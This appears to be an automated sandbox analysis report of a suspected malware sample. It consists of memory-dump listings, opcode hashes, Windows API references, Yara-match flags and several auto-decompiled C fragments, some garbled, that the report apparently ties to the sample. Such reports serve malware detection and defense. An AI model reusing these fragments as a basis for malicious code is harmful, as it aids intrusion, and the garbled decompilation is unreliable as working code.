LdrInitializeThunk.NTDLL ref: 00840086

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 0083F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083F9FB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0083F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083F90E

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0083FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FADB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0083FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FAF3

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0083FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FBC3

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0083FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FB73

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0083FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FC9B

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0083FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FC6B

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0083FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FD9A

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0083FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FDCB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0083FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FEAB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0083FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FEDB

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0083FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0083FFBF

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A6, Relevance: 3.1, APIs: 2, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: a9bd6c730127ed9788819e79466a58329f2104e53292cd3b074b45a9944d7f8d
Instruction ID: d778e9e16294c48b030167fbd175f1c58e9cce250e12698c61ff966b7b44f271
Opcode Fuzzy Hash: a9bd6c730127ed9788819e79466a58329f2104e53292cd3b074b45a9944d7f8d
Instruction Fuzzy Hash: 7601DEB51052046FDB14EF69DC81CE73BA8EF88310B14854AF84957202C234E9A4CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0041A139, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c2bb4a4dec1c89e7e7d685ceb4679c1d559818c4e4ee736dfbf1889f7781eb6c
Instruction ID: 896dca302a395a4d6de48def5851c936774caefc23b97b316a2f67526da34e43
Opcode Fuzzy Hash: c2bb4a4dec1c89e7e7d685ceb4679c1d559818c4e4ee736dfbf1889f7781eb6c
Instruction Fuzzy Hash: CC1129B5205208BBCB04DF99CC81EEB77ADAF8C714F158659F94DA7241C630E851CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 004082EC, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004082EC(void* __eax, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				void* _t37;

				_t37 = __eflags;
				asm("stc");
				asm("sbb eax, 0x83ec8b55");
				_t30 = _t32;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t14 = E0040ACD0(_t37, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t27 = _t15;
				if(_t27 != 0) {
					_t22 = _a8;
					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t39 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A460(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x004082ec
0x004082ec
0x004082ef
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2a4f021b281fc91f3f55382ac1733110e4ec62c60d4fe3626aae81126111c76d
Instruction ID: 032edfced3be88e9a485307559504c5ccc94bc533ac1c06a480b08d6b8950726
Opcode Fuzzy Hash: 2a4f021b281fc91f3f55382ac1733110e4ec62c60d4fe3626aae81126111c76d
Instruction Fuzzy Hash: E401F731A802287AE720A6A59D43FFE772CAB40F55F04411EFF04FA1C1D6A96A0647E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C4, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0041A1C4(void* __edi, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _t31;
				signed int _t32;
				void* _t36;

				_t32 = _t31 + _t36;
				asm("das");
				asm("a16 lodsb");
				if (( *(__edi - 0x178b2b01) & _t32) <= 0) goto L3;
				_push(_t32);
			}

0x0041a1c4
0x0041a1c6
0x0041a1c7
0x0041a1cf
0x0041a1d0

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b81a5493ae8f945c02c4a4f157589d24ca64c62716d02af167ea531d6ca654bf
Instruction ID: f6a7c93bc697d3c15963036fd0ef1d24dab798bef6e9d4a7aa926413973542c8
Opcode Fuzzy Hash: b81a5493ae8f945c02c4a4f157589d24ca64c62716d02af167ea531d6ca654bf
Instruction Fuzzy Hash: 28F08CB1204308ABCA10EF94DC86DE737A8EF88220F05845AFD485B242D635E9608BE6

Uniqueness

Uniqueness Score: -1.00%

Function 00419FF6, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cb9419aec1a99feace6937aadf7adf80ce3df99526dcaa86d4773fad100af43e
Instruction ID: 2300840be128c6a2cf138ad90cc2b4ec6ecca1d559bca8e3d8fda348f570986d
Opcode Fuzzy Hash: cb9419aec1a99feace6937aadf7adf80ce3df99526dcaa86d4773fad100af43e
Instruction Fuzzy Hash: 97F0A7B62002146FD714EF94DC80EF7B76DEF84320F158669F9485B201D631E954C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041A062(void* __ebx, void* __ecx, char __edx, void* __eflags, intOrPtr _a12, void* _a16, signed char _a20, void* _a24) {
				signed char _t9;
				char _t11;
				void* _t22;

				_t16 = __ecx;
				_pop(_t22);
				if(__eflags >= 0) {
					asm("lock sub al, 0x6b");
					 *((char*)(__ebx + 0x1641057f)) = __edx;
					if(__eflags <= 0) {
						_push(ss);
					}
					_t12 = _a12;
					_t5 = _t12 + 0xc74; // 0xc74
					_t23 = _t5;
					E0041A960(_t22, _a12, _t5,  *((intOrPtr*)(_a12 + 0x10)), 0, 0x35);
					_t9 = _a20;
					_t16 = _a16;
				}
				asm("les edx, [edx+edx*2]");
				_push(_t9 | 0x00000083);
				_t11 = RtlFreeHeap(_t16); // executed
				return _t11;
			}

0x0041a062
0x0041a062
0x0041a063
0x0041a065
0x0041a068
0x0041a06a
0x0041a06d
0x0041a070
0x0041a073
0x0041a07f
0x0041a07f
0x0041a087
0x0041a08f
0x0041a092
0x0041a092
0x0041a096
0x0041a09b
0x0041a09d
0x0041a0a1

